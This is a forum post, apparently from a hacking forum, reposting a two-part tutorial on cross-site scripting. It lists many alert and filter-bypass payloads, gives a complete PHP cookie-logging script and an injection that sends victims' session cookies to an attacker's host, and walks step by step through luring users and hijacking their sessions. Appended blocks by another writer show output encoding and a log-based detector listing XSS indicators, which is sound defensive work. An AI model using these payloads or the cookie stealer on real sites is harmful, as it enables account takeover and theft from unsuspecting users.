XSS Tutorial ara
04.12.2017 at 05:25
#1
=AlexDrift=
Trump cards don't matter if the game isn't for score...
Status: Offline
Registered: 24.11.2012
Posts: 587
Reputation: 84
To add the "Portal Legend" medal, add to ?if "or 1='user ID'"
To add the "Golden Guardian" medal, add to ?if "or 1='user ID'"
Code
Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lately been flooding, and I've received a lot of requests on making this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS.

I saw that nobody actually posted an XSS TUT for those in need, so here it is. . .

What is XSS?

XSS stands for Cross-Site-Scripting. It is basically an attack that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into downloading a virus that you've created, such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also set up a Cookie-Stealer/Logger. Anything you can do with HTML can be used against a site with this attack. I will explain some of the most important terms associated with XSS.

What is HTML and Javascript?

HTML
HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.

Javascript
Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java is a language that resembles C++; it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages as HTML is. Javascript is used more in applications outside of webpages, like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.

XSS: My first attack.
Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS. If you know the basics of XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet.

Now, our first step is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries to test your site for XSS.

Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source as well. You can't just take any script, and edit the full thing. But editing an "onmouseover" script is definitely an exception. I will be explaining this method of XSS later on; for now, we need the complete basics.

Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar.

So, let's try putting in the most known, BASIC query of all time.

<script>alert("XSS")</script>

That little script is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes these filters are very weak, and can be bypassed very easily; other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blocking the alert. Here's an example of this kind of filter:

<script>alert("XSS")</script>

>
<script>alert( > XSS DETECTED < )</script>

It will block the quotes. So how the hell do we get past that? Well, thankfully there's a way to encrypt the full message. We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text into ASCII. An example of this encryption would be like this:

String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:

<script>alert(String.fromCharCode(88,83,83))</script>

You do NOT need ANY quotes in a simple query like that. So let's put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:
'><script<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><script>alert("XSS")</SCRIPT>
</SCRIPT>"><script>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><script>alert("XSS")</SCRIPT>
</SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes; you should create some too, they can come in handy a lot.

These are just the basic methods!

Anyway: copy-paste version :)
So if it's right, give a thanks.. if not, you can't curse me out :P

part 2
======================

=========================
COOKIE STEALING WITH XSS
=========================

I guess you already know a bit of the theory behind XSS, so we'll get right to the code.

Let's say a web page has a search function that uses this code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>

We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

<script>alert("test")</script>

When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

"><script>alert("test")</script>

This should close the quotes and end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example:

http://www.site.com/search.php?q"><script>alert("test")</script>

Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here: http://centricle.com/tools/ascii-hex/

Hexing the query of this url gives us

http://www.site.com/search.php?q "><script>alert("test")<%2 fscript>

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

=========================================

<?php

function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a ");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();

?>
=========================================

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

"><script language="JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie" document.cookie;document.location="http://www.whateversite.com/"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

logData();
?>

to this:

logData();

echo '<b>Page Under Construction</b>'
?>

Now when you open log.txt, you should see something like this:

IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0. Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.victimssite.com/search.php | DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.

                             ...::: MUTTAKEE :::...
                    Bangladesh Cyber Army

I won't reply in PM, don't even try. All questions go on the forum; create a topic there and we'll answer.
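As an added example, not code from the tutorial or from the poster, here is the other side of part 2's `">` breakout: the same search form rendered once the way the post describes (the query pasted straight into `value=""`) and once with attribute-context encoding, which is the fix that makes every listed payload stay inert. The function names and the small attribute-extraction check are my own assumptions; the payloads are quoted from the post and used only as test input.

```javascript
// Added example (not from the tutorial above): the reflected search box the post
// attacks, rendered two ways. The vulnerable renderer pastes the query straight into
// the value="" attribute, so the "> breakout works; the fixed renderer encodes the
// five HTML metacharacters first, so the same input stays inside the attribute.
// Function names are my own; the payloads are the ones the post lists.

// Payloads quoted from the tutorial, used here only as test input.
const TUTORIAL_PAYLOADS = [
  '<script>alert("XSS")</script>',
  '"><script>alert("test")</script>',
  '"/><script>alert(String.fromCharCode(88,83,83))</script>',
  "'/><script>alert(\"XSS\")</script>",
  '</SCRIPT>"><script>alert("XSS")</SCRIPT>',
];

// The page's search form with the user's query reflected unencoded (the bug).
function renderSearchVulnerable(q) {
  return '<tr><td>Name</td><td><input type="text" name="advisor_name" value="' +
    q + '"></td></tr>';
}

// Attribute-context encoder: & is replaced first so later entities are not re-encoded.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Same form, query encoded for the attribute context it is inserted into.
function renderSearchSafe(q) {
  return '<tr><td>Name</td><td><input type="text" name="advisor_name" value="' +
    escapeHtmlAttr(q) + '"></td></tr>';
}

// Inverse of escapeHtmlAttr (entities decoded last-to-first), to show that the
// browser still sees the original search text inside the attribute.
function decodeHtmlEntities(s) {
  return s
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Pull the value attribute back out of the markup: a double-quoted attribute ends at
// the first " after it opens, which is exactly what the "> breakout relies on.
function extractValueAttr(html) {
  const m = /value="([^"]*)"/.exec(html);
  return m ? m[1] : null;
}

// True when a <script start tag exists outside any attribute value, i.e. the injected
// text has become a real element. Case-insensitive, as a browser's tokenizer is.
function hasScriptElement(html) {
  const stripped = html.replace(/value="[^"]*"/g, 'value=""');
  return /<script\b/i.test(stripped);
}

// Run every payload through both renderers and summarise the outcome per payload.
function compareRenderers(payloads = TUTORIAL_PAYLOADS) {
  return payloads.map((p) => {
    const vuln = renderSearchVulnerable(p);
    const safe = renderSearchSafe(p);
    return {
      payload: p,
      vulnerableExecutes: hasScriptElement(vuln),
      safeExecutes: hasScriptElement(safe),
      // The encoded attribute decodes back to the exact search string.
      safeRoundTrips: decodeHtmlEntities(extractValueAttr(safe)) === p,
    };
  });
}

console.log(JSON.stringify(compareRenderers(), null, 2));
```

The check models only the one parsing rule that matters here: a double-quoted attribute ends at the first `"`. That is also why the post's `'/>`-prefixed variants do nothing against a `value="..."` field, while the `">`-prefixed ones do. Encoding is per context: this encoder covers attribute values and text nodes, not insertion into a script block or a URL. It pairs with the HttpOnly flag on the session cookie, which keeps `document.cookie` from handing the session to an injected script in the first place.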
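A second added example, mine rather than the post's: the injected-link step in the procedure above leaves a trace in the web server's access log, and the payloads listed in both parts share a handful of substrings. This detector takes the request target out of each common-log-format line, percent-decodes it repeatedly (since `%253C` hides `%3C`, which hides `<`), lower-cases it and reports which indicators appear. The log lines, IP addresses and indicator list are constructed for the example and are not real traffic.

```javascript
// Added example (not part of the tutorial): a small detector for the reflected-XSS
// probes the post describes, run over web server access log lines. The sample lines
// and the indicator list are constructed test data, not real traffic.

// Constructed access log lines in the common log format; the queries include the
// plain, hex-encoded and double-encoded forms a probe may arrive in.
const SAMPLE_LOG = [
  '10.0.0.5 - - [04/Dec/2017:05:25:01 +0000] "GET /search.php?q=hello+world HTTP/1.1" 200 512',
  '10.0.0.7 - - [04/Dec/2017:05:25:02 +0000] "GET /search.php?q=%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E HTTP/1.1" 200 900',
  '10.0.0.9 - - [04/Dec/2017:05:25:03 +0000] "GET /search.php?q=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E HTTP/1.1" 200 900',
  '10.0.0.9 - - [04/Dec/2017:05:25:04 +0000] "GET /search.php?q=%253Cscript%253Edocument.location%3D%22http://yoursite.example/x.php?cookie%3D%22%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 900',
  '10.0.0.3 - - [04/Dec/2017:05:25:05 +0000] "GET /index.php HTTP/1.1" 200 2048',
];

// Substrings the tutorial's payloads share; compared after decoding and lower-casing
// so case games like <ScRIPt> and hex encoding like %3C do not hide them.
const INDICATORS = [
  '<script', 'string.fromcharcode', 'document.cookie', 'document.location',
  'javascript:', 'onmouseover=',
];

// Take the request target out of a common-log-format line (null if it is not one).
function requestPath(line) {
  const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[0-9.]+"/.exec(line);
  return m ? m[1] : null;
}

// Percent-decode repeatedly, bounded, so %253C (which decodes to %3C, then to <) is
// seen as the character the browser will eventually receive. Malformed %xx sequences
// make decodeURIComponent throw; stop decoding at that point rather than drop the line.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Return the indicators found in one line, or an empty list for benign traffic.
function findIndicators(line) {
  const path = requestPath(line);
  if (path === null) return [];
  const decoded = fullyDecode(path).toLowerCase();
  return INDICATORS.filter((ind) => decoded.includes(ind));
}

// Summarise a log: source IP and matched indicators for every flagged line.
function scanLog(lines = SAMPLE_LOG) {
  const hits = [];
  for (const line of lines) {
    const found = findIndicators(line);
    if (found.length === 0) continue;
    hits.push({ ip: line.split(' ')[0], indicators: found });
  }
  return hits;
}

console.log(scanLog());
```

Treat hits as triage leads rather than verdicts: `<script` in a query string is almost always a probe, but a short list like this misses event-handler and attribute-only payloads, and matching `alert(` on its own would be noisy. The log tells you who tried; the output encoding on the server is what stops the attempt from working.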
